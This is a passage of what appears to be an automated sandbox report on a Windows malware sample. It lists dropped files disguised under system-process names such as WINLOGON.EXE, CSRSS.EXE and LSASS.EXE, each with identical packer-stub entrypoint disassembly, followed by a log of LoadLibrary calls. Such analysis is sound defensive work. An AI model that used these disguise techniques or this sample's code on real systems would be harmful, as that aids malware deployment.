-4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"services.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"shell.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4k51k4.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"New Folder.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"Empty.pif\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"WINLOGON.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C450.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C452.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"MrHelloween.scr\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C88D.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"4K51K4.EXE.67A9C740.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"CSRSS.EXE\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"\n \"IEXPLORER.EXE.67A9C743.bin\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x417000,lea\tedi, [esi - 0x16000],push\tedi,or\tebp, 0xffffffff,jmp\t0x41c252,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x41c259,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x41c248,mov\teax, 1,add\tebx, ebx,jne\t0x41c26b,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x41c260,jne\t0x41c27c,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x41c260,xor\tecx, ecx,sub\teax, 3,jb\t0x41c290,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x41c302,mov\tebp, eax,add\tebx, ebx,jne\t0x41c29b,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005064)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005888)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005888)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005952)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005952)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005948)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004164)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006124)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006124)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006056)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006056)\n 